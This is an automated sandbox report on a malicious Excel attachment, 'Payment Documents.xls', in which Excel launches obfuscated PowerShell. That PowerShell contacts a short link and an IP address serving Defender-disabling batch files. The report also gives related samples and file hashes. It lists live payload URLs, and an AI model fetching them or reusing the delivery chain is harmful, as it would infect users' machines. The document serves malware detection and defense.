  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 336485 Sample: Payment Documents.xls Startdate: 06/01/2021 Architecture: WINDOWS Score: 68 45 Multi AV Scanner detection for submitted file 2->45 47 Obfuscated command line found 2->47 49 Sigma detected: Microsoft Office Product Spawning Windows Shell 2->49 51 2 other signatures 2->51 8 EXCEL.EXE 37 37 2->8         started        process3 signatures4 53 Obfuscated command line found 8->53 55 Document exploit detected (process start blacklist hit) 8->55 11 cmd.exe 1 8->11         started        14 cmd.exe 1 8->14         started        16 cmd.exe 1 8->16         started        18 2 other processes 8->18 process5 signatures6 57 Obfuscated command line found 11->57 20 powershell.exe 15 17 11->20         started        23 conhost.exe 11->23         started        25 powershell.exe 16 14->25         started        27 conhost.exe 14->27         started        29 powershell.exe 18 16->29         started        31 conhost.exe 16->31         started        33 powershell.exe 21 18->33         started        35 powershell.exe 16 18->35         started        37 2 other processes 18->37 process7 dnsIp8 41 cutt.ly 104.22.0.232, 443, 49765 CLOUDFLARENETUS United States 20->41 43 37.46.150.139, 49766, 80 IWAYCH Moldova Republic of 20->43 39 attrib.exe 25->39         started        process9

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Payment Documents.xls13%ReversingLabsDocument-Word.Trojan.Heuristic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.pngl0%Avira URL Cloudsafe
http://37.46.150.1394Me0%Avira URL Cloudsafe
https://go.micro0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png(0%Avira URL Cloudsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://37.46.150.1390%Avira URL Cloudsafe
https://cutt.ly/3js2g8s0%Avira URL Cloudsafe
http://37.46.150.139/bat/scriptxls_cf6c45a3-4840-422a-8668-e9a12252c924_thecabal1_wddisabler.bat0%Avira URL Cloudsafe
http://crl.h0%Avira URL Cloudsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
http://cutt.ly0%Avira URL Cloudsafe
http://status.rapidssl.com00%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
cutt.ly
104.22.0.232
truetrue
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://37.46.150.139/bat/scriptxls_cf6c45a3-4840-422a-8668-e9a12252c924_thecabal1_wddisabler.batfalse
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.953342990.00000000062A6000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.972171242.00000000057E9000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.957524722.0000000006167000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.970974266.0000000005699000.00000004.00000001.sdmpfalse
      		high
      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.963794619.00000000048C2000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000003.919929035.000000000812B000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.940720063.0000000005242000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.974235994.00000000072BC000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.955055191.0000000004911000.00000004.00000001.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      		unknown
      http://pesterbdd.com/images/Pester.pnglpowershell.exe, 0000000E.00000002.961261599.0000000004771000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.963794619.00000000048C2000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000003.919929035.000000000812B000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.940720063.0000000005242000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.974235994.00000000072BC000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.955055191.0000000004911000.00000004.00000001.sdmpfalse
        		high
        http://37.46.150.1394Mepowershell.exe, 0000000F.00000002.958975696.0000000004C45000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        		low
        https://go.micropowershell.exe, 00000009.00000003.906986819.00000000051C2000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000003.905471966.0000000005B30000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000003.899219620.0000000005061000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://cacerts.rapidssl.com/RapidSSLTLSRSACAG1.crt0powershell.exe, 0000000F.00000002.958743859.0000000004C24000.00000004.00000001.sdmpfalse
          		high
          http://pesterbdd.com/images/Pester.png(powershell.exe, 0000000F.00000002.955055191.0000000004911000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://contoso.com/Licensepowershell.exe, 0000000E.00000002.970974266.0000000005699000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          https://contoso.com/Iconpowershell.exe, 0000000E.00000002.970974266.0000000005699000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://www.apache.org/licenses/LICENSE-2.0.htmllpowershell.exe, 0000000E.00000002.961261599.0000000004771000.00000004.00000001.sdmpfalse
            		high
            http://37.46.150.139powershell.exe, 0000000F.00000002.958975696.0000000004C45000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://cutt.ly/3js2g8spowershell.exe, 0000000F.00000002.955055191.0000000004911000.00000004.00000001.sdmptrue
            • Avira URL Cloud: safe
            		unknown
            https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.963794619.00000000048C2000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000003.919929035.000000000812B000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.940720063.0000000005242000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.974235994.00000000072BC000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.955055191.0000000004911000.00000004.00000001.sdmpfalse
              		high
              http://cdp.rapidssl.com/RapidSSLTLSRSACAG1.crl0Lpowershell.exe, 0000000F.00000002.958743859.0000000004C24000.00000004.00000001.sdmpfalse
                		high
                https://github.com/Pester/Pesterlpowershell.exe, 0000000E.00000002.961261599.0000000004771000.00000004.00000001.sdmpfalse
                  		high
                  http://crl.hpowershell.exe, 00000006.00000003.912180483.0000000008379000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://contoso.com/powershell.exe, 0000000E.00000002.970974266.0000000005699000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  https://github.com/Pester/Pester(powershell.exe, 0000000F.00000002.955055191.0000000004911000.00000004.00000001.sdmpfalse
                    		high
                    https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.953342990.00000000062A6000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.972171242.00000000057E9000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.957524722.0000000006167000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.970974266.0000000005699000.00000004.00000001.sdmpfalse
                      		high
                      http://cutt.lypowershell.exe, 0000000F.00000002.958743859.0000000004C24000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.apache.org/licenses/LICENSE-2.0.html(powershell.exe, 0000000F.00000002.955055191.0000000004911000.00000004.00000001.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.936758656.0000000005241000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.962445153.0000000004781000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.938034330.0000000005101000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.959408450.0000000004631000.00000004.00000001.sdmpfalse
                          		high
                          http://status.rapidssl.com0powershell.exe, 0000000F.00000002.958743859.0000000004C24000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown

                          Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public

                          IPDomainCountryFlagASNASN NameMalicious
                          104.22.0.232
                          		unknownUnited States
                          		13335CLOUDFLARENETUStrue
                          37.46.150.139
                          		unknownMoldova Republic of
                          		8758IWAYCHfalse

                          General Information

                          Joe Sandbox Version:31.0.0 Red Diamond
                          Analysis ID:336485
                          Start date:06.01.2021
                          Start time:08:40:18
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 16m 1s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Sample file name:Payment Documents.xls
                          Cookbook file name:defaultwindowsofficecookbook.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Run name:Potential for more IOCs and behavior
                          Number of analysed new started processes analysed:29
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal68.expl.evad.winXLS@31/32@1/2
                          EGA Information:Failed
                          HDC Information:Failed
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 410
                          • Number of non-executed functions: 9
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found application associated with file extension: .xls
                          • Found Word or Excel or PowerPoint or XPS Viewer
                          • Attach to Office via COM
                          • Scroll down
                          • Close Viewer
                          Warnings:
                          Show All
                          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                          • Excluded IPs from analysis (whitelisted): 13.64.90.137, 104.43.139.144, 168.61.161.212, 52.109.88.177, 52.109.8.22, 51.104.139.180, 92.122.213.194, 92.122.213.247, 2.20.142.210, 2.20.142.209, 52.155.217.156, 20.54.26.129
                          • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, prod.configsvc1.live.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/336485/sample/Payment Documents.xls

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          08:42:33API Interceptor381x Sleep call for process: powershell.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          104.22.0.232sample products trade reference.docxGet hashmaliciousBrowse
                          • cutt.ly/
                          Request_for_Quotation.xlsmGet hashmaliciousBrowse
                          • cutt.ly/gdvAeui
                          37.46.150.139Payment Documents.xlsGet hashmaliciousBrowse
                          • 37.46.150.139/bat/scriptxls_cf6c45a3-4840-422a-8668-e9a12252c924_thecabal1_wddisabler.bat
                          spetsifikatsiya.xlsGet hashmaliciousBrowse
                          • 37.46.150.139/bat/scriptxls_687c7069-ef4b-4efe-b745-594285a9a92b_mic2_wddisabler.bat
                          1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xlsGet hashmaliciousBrowse
                          • 37.46.150.139/bat/scriptxls_27c96e3c-9015-4716-8c85-64582d96aaaf_zilla07_wdexclusion.bat
                          spetsifikatsiya.xlsGet hashmaliciousBrowse
                          • 37.46.150.139/bat/scriptxls_047e37f7-e236-4c64-9509-11f16943b4e0_mic2_wddisabler.bat
                          New Avinode Plans and Prices 2021.xlsGet hashmaliciousBrowse
                          • 37.46.150.139/bat/scriptxls_3357e6d8-1780-4654-872a-eca3aa375ffd_kingshakes_wdexclusion.bat
                          spetsifikatsiya.xlsGet hashmaliciousBrowse
                          • 37.46.150.139/bat/scriptxls_43922847-73c3-4df3-b101-5f9d12f30aed_mic2_wddisabler.bat
                          spetsifikatsiya.xlsGet hashmaliciousBrowse
                          • 37.46.150.139/bat/scriptxls_43922847-73c3-4df3-b101-5f9d12f30aed_mic2_wddisabler.bat
                          AdviceSlip.xlsGet hashmaliciousBrowse
                          • 37.46.150.139/bat/scriptxls_929f596a-b84d-4151-a6b5-c95e07d329c0_frankie777_wddisabler.bat
                          Export Order Vene.xlsGet hashmaliciousBrowse
                          • 37.46.150.139/bat/scriptxls_d8648b70-66b3-4072-9876-0224b204a193_spicytorben_wdexclusion.bat

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          cutt.lyShipping Document PLBL003534.xlsGet hashmaliciousBrowse
                          • 104.22.1.232
                          6Cprm97UTl.xlsGet hashmaliciousBrowse
                          • 104.22.0.232
                          spetsifikatsiya.xlsGet hashmaliciousBrowse
                          • 104.22.0.232
                          1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xlsGet hashmaliciousBrowse
                          • 172.67.8.238
                          spetsifikatsiya.xlsGet hashmaliciousBrowse
                          • 104.22.1.232
                          New Avinode Plans and Prices 2021.xlsGet hashmaliciousBrowse
                          • 172.67.8.238
                          spetsifikatsiya.xlsGet hashmaliciousBrowse
                          • 104.22.0.232
                          spetsifikatsiya.xlsGet hashmaliciousBrowse
                          • 172.67.8.238
                          AdviceSlip.xlsGet hashmaliciousBrowse
                          • 104.22.0.232
                          file.xlsGet hashmaliciousBrowse
                          • 104.22.1.232
                          file.xlsGet hashmaliciousBrowse
                          • 172.67.8.238
                          file.xlsGet hashmaliciousBrowse
                          • 172.67.8.238
                          output.xlsGet hashmaliciousBrowse
                          • 172.67.8.238
                          SecuriteInfo.com.Heur.20246.xlsGet hashmaliciousBrowse
                          • 172.67.8.238
                          SecuriteInfo.com.Exploit.Siggen3.5270.27062.xlsGet hashmaliciousBrowse
                          • 104.22.1.232
                          SecuriteInfo.com.Exploit.Siggen3.5270.27062.xlsGet hashmaliciousBrowse
                          • 104.22.0.232
                          30689741.xlsGet hashmaliciousBrowse
                          • 172.67.8.238
                          95773220855.xlsGet hashmaliciousBrowse
                          • 104.22.1.232
                          95773220855.xlsGet hashmaliciousBrowse
                          • 172.67.8.238

                          ASN

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          CLOUDFLARENETUSDATA-480841.docGet hashmaliciousBrowse
                          • 104.18.61.59
                          eTrader-0.1.0.exeGet hashmaliciousBrowse
                          • 104.23.98.190
                          Documenten_9274874 8574977265.docGet hashmaliciousBrowse
                          • 104.18.61.59
                          eTrader-0.1.0.exeGet hashmaliciousBrowse
                          • 104.23.99.190
                          pack-91089 416755919.docGet hashmaliciousBrowse
                          • 104.18.61.59
                          Payment Documents.xlsGet hashmaliciousBrowse
                          • 104.22.1.232
                          Shipping Document PLBL003534.xlsGet hashmaliciousBrowse
                          • 104.22.1.232
                          QPI-01458.exeGet hashmaliciousBrowse
                          • 172.67.188.154
                          LITmNphcCA.exeGet hashmaliciousBrowse
                          • 104.28.5.151
                          http://fake-cash-app-screenshot-generator.hostforjusteasy.funGet hashmaliciousBrowse
                          • 172.67.179.45
                          http://download2224.mediafire.com/5rqvtr7atabg/4ufxk777x7qfcdd/FastStoneCapturePortableTW_9.0_azo.exeGet hashmaliciousBrowse
                          • 104.16.203.237
                          http://click.freshwaterlive.info/campaign/clicked/MjgzNjAxMzU%3D__MTAxOA%3D%3D__MjY3NzY5Ng%3D%3D__MjI2/aHR0cDovL2JpdC5seS8ySk1GMUJk?c=28360135Get hashmaliciousBrowse
                          • 104.16.19.94
                          https://awattorneys-my.sharepoint.com/:b:/p/fgalante/EcRfEpzLM_tOh_Roewbwm9oB4JarWh_30QaPZLGUdNbnuw?e=4%3aqmwocp&at=9Get hashmaliciousBrowse
                          • 104.16.18.94
                          http://reppoflag.net/2307e0382f77c950a2.jsGet hashmaliciousBrowse
                          • 172.64.170.19
                          https://firebasestorage.googleapis.com/v0/b/blckaxe.appspot.com/o/general%20page.html?alt=media&token=b4029a1b-78f5-43ff-a7eb-d4555ad6a60e#kymo@willowoodusa.comGet hashmaliciousBrowse
                          • 104.16.18.94
                          http://hoquetradersltd.com/jordanbruce/index.phpGet hashmaliciousBrowse
                          • 104.16.18.94
                          https://web.tresorit.com/l/d2q5C#T3PZC5SR6Y1Akp1-8AT_JgGet hashmaliciousBrowse
                          • 104.18.70.113
                          https://preview.hs-sites.com/_hcms/preview/template/multi?domain=undefined&hs_preview_key=SlyW7XnGAffndKslJ_Oq0Q&portalId=8990448&tc_deviceCategory=undefined&template_file_path=mutli/RFQ.htmlGet hashmaliciousBrowse
                          • 104.16.115.104
                          HSBC Payment Advice - HSBC67628473234[20201412].exeGet hashmaliciousBrowse
                          • 172.67.156.125
                          http://search.hwatchtvnow.coGet hashmaliciousBrowse
                          • 104.18.225.52
                          IWAYCHPayment Documents.xlsGet hashmaliciousBrowse
                          • 37.46.150.139
                          spetsifikatsiya.xlsGet hashmaliciousBrowse
                          • 37.46.150.139
                          1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xlsGet hashmaliciousBrowse
                          • 37.46.150.139
                          spetsifikatsiya.xlsGet hashmaliciousBrowse
                          • 37.46.150.139
                          New Avinode Plans and Prices 2021.xlsGet hashmaliciousBrowse
                          • 37.46.150.139
                          spetsifikatsiya.xlsGet hashmaliciousBrowse
                          • 37.46.150.139
                          spetsifikatsiya.xlsGet hashmaliciousBrowse
                          • 37.46.150.139
                          AdviceSlip.xlsGet hashmaliciousBrowse
                          • 37.46.150.139
                          Export Order Vene.xlsGet hashmaliciousBrowse
                          • 37.46.150.139
                          SimpNet.shGet hashmaliciousBrowse
                          • 37.46.150.238
                          Rr0veY2Ho5.exeGet hashmaliciousBrowse
                          • 37.46.150.211
                          product_qoute_6847684898.xlsGet hashmaliciousBrowse
                          • 37.46.150.211
                          EjtRDKZNkXWoLTE.exeGet hashmaliciousBrowse
                          • 37.46.150.60
                          ru7co.xlsGet hashmaliciousBrowse
                          • 37.46.150.60
                          http://37.46.150.184/high/imanGet hashmaliciousBrowse
                          • 37.46.150.184
                          SWIFT-MTC749892-10-12-20_pdf.exeGet hashmaliciousBrowse
                          • 37.46.150.41
                          SWIFT COPY.xlsGet hashmaliciousBrowse
                          • 37.46.150.41
                          PAYMENT DOC.xlsGet hashmaliciousBrowse
                          • 37.46.150.41
                          ORDER LIST.xlsGet hashmaliciousBrowse
                          • 37.46.150.41
                          AYnBjTXSlkDlSOE.exeGet hashmaliciousBrowse
                          • 37.46.150.41

                          JA3 Fingerprints

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          54328bd36c14bd82ddaa0c04b25ed9adQPI-01458.exeGet hashmaliciousBrowse
                          • 104.22.0.232
                          LITmNphcCA.exeGet hashmaliciousBrowse
                          • 104.22.0.232
                          HSBC Payment Advice - HSBC67628473234[20201412].exeGet hashmaliciousBrowse
                          • 104.22.0.232
                          Ema.exeGet hashmaliciousBrowse
                          • 104.22.0.232
                          Setup_6953.exeGet hashmaliciousBrowse
                          • 104.22.0.232
                          Order_1101201918_AUTECH.exeGet hashmaliciousBrowse
                          • 104.22.0.232
                          bank Acct Numbr-pdf.exeGet hashmaliciousBrowse
                          • 104.22.0.232
                          1FXO8fI8R3.exeGet hashmaliciousBrowse
                          • 104.22.0.232
                          output.xlsGet hashmaliciousBrowse
                          • 104.22.0.232
                          output.xlsGet hashmaliciousBrowse
                          • 104.22.0.232
                          spetsifikatsiya.xlsGet hashmaliciousBrowse
                          • 104.22.0.232
                          Shipping Details DHL.xlsGet hashmaliciousBrowse
                          • 104.22.0.232
                          TOP URGENT RFQ 2021 Anson Yang.exeGet hashmaliciousBrowse
                          • 104.22.0.232
                          n1hou07jRi.exeGet hashmaliciousBrowse
                          • 104.22.0.232
                          Product Catalogue List. docs.exeGet hashmaliciousBrowse
                          • 104.22.0.232
                          sample details.exeGet hashmaliciousBrowse
                          • 104.22.0.232
                          SZOSVrCvEl.exeGet hashmaliciousBrowse
                          • 104.22.0.232
                          7Q9nwPpPpZ.exeGet hashmaliciousBrowse
                          • 104.22.0.232
                          lKRxa2Vb4W.exeGet hashmaliciousBrowse
                          • 104.22.0.232
                          1hv5th1EwE.exeGet hashmaliciousBrowse
                          • 104.22.0.232

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\0C734193-0592-4A0A-BF26-86C8530A206C
                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                          File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):130397
                          Entropy (8bit):5.377000611349983
                          Encrypted:false
                          SSDEEP:1536:vcQceNgrA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8Eh:OmQ9DQW+zBX8P
                          MD5:EC46AAB5A35D421F11D0CB686F3EDE3F
                          SHA1:031A4FF5B9ED0402105BD3F5F7CFCEDEC750F993
                          SHA-256:CD6DA1C121DDF11FC3A14FF0EF38917156CB659AD4CBD0CE90E1A26AF1EE5123
                          SHA-512:18EE21A00BF48415092C5EEAE1FC349548D8C7D2103D3DBF8874D2194A23F5858DD563524C4630E8869126347E221C73DA2671C25F5C4BFC538113EEA0DAA88D
                          Malicious:false
                          Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-01-06T07:41:18">.. Build: 16.0.13616.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6527
                          Entropy (8bit):4.946791357663498
                          Encrypted:false
                          SSDEEP:192:CdcU6COib4Yxoe5FVsm5emdzgkjDt4iWN3yBGHc9smgdcU6CupO0ib4J:Jib4Mokjh4iUxepib4J
                          MD5:5476B2BF2AE56154DE77539607E3B1D9
                          SHA1:971D7A25DA3DA1A83983C96E85D6642508D10BA4
                          SHA-256:B856514C0B01A376C82E98B23C1E8767F618F27F57CFC28C228AB468A6DCBAFB
                          SHA-512:86E29883F01FB8EDC85C201A23CE83885BC09EB51C48D08174BEAA31A3C537DC2B314FDB700C7C9C012978AD6D6F425F47BB5A535B065A9D1B18EBC058937161
                          Malicious:false
                          Preview: PSMODULECACHE.............a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package........Find-Package........Install-PackageProvider........Import-PackageProvider........Get-PackageProvider........Register-PackageSource........Uninstall-Package........Find-PackageProvider........D..........C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Microsoft.PowerShell.Operation.Validation.psd1........Get-OperationValidation........Invoke-OperationValidation........PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command..
                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):17688
                          Entropy (8bit):5.282027333056662
                          Encrypted:false
                          SSDEEP:384:DtpLIsNRov/TQzPUpQ9s9OrtmmR2j+FDGl:Usv/zcpQ9gkwwFI
                          MD5:0EAD1153027999BC9822A501C02A7A19
                          SHA1:3AA1643B2CCAB170E97E3C1ABFB7BB25C5402443
                          SHA-256:FD4A874A31993171994A7CF2154B5B6F830BDFDD87A199045647C4CB3C8FF6B9
                          SHA-512:F40697F0290ACC2AF295CC75FE52680BDEF7B9F1880183F4ACF9BBBA4F958C3F60CCB61C129FE6C237B46DAB9AFB168A4146FDE81CA3F6012B0BA7A79F92EE83
                          Malicious:false
                          Preview: @...e.........../...........:.-.........E............@..........D...............fZve...F.....x.)........System.Management.AutomationH...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHost4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.<................):gK..G...$.1.q........System.ConfigurationH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                          C:\Users\user\AppData\Local\Temp\33D40000
                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):11998
                          Entropy (8bit):7.0580517056356555
                          Encrypted:false
                          SSDEEP:192:sbviPXFOWgcmJ7dJj5PFem5dHbDJW4RFSS8+DlGP8:2KPF7gbj5tjPs4RQS8Oi8
                          MD5:6DE2ECBDC7AFE7EDBBC29AD63D12C8B5
                          SHA1:13D6E4FC87C1EC76D9FCB60511E1998080A9ABFF
                          SHA-256:2A58F1D43B6F7121B37FE37704138B68254EADD460CE2569BD75E4E88116AED4
                          SHA-512:093E3AC32605F5E9E89E2E3ACF7C4DF3216CC8853E14BA859A30AD40DCC51E7A046C2AFE4F5ADF585117EE3579D2A8F001DEB6E74422C5F186F0C275E2BBD0FD
                          Malicious:false
                          Preview: ..MO.0...H..*W.fp@.......6~@.xk.4.bol.....C..\..........]...6.R\......X?-...9.....F...+@....V.0.h......+...!..IH.".LS....).N.V...<..h.^..&j.(./..:..."{\.kP.P1:..q.r../H.&....=.Y...@....vEL..i.Dl....L..<..U..mbX.Wl}..Y..j......l.........!..!.."Mij.a......V:..Wc......p..........n...r.....N&..a.....$.....}.b.p.... ....P.s.E..+.....b...|.>.... ..<..._...k...B....v..-.g....2`v.e;.{........PK..........!...O!....].......[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................MO.0...H.......BKwAH.!
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1f0qrvj3.2o0.psm1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
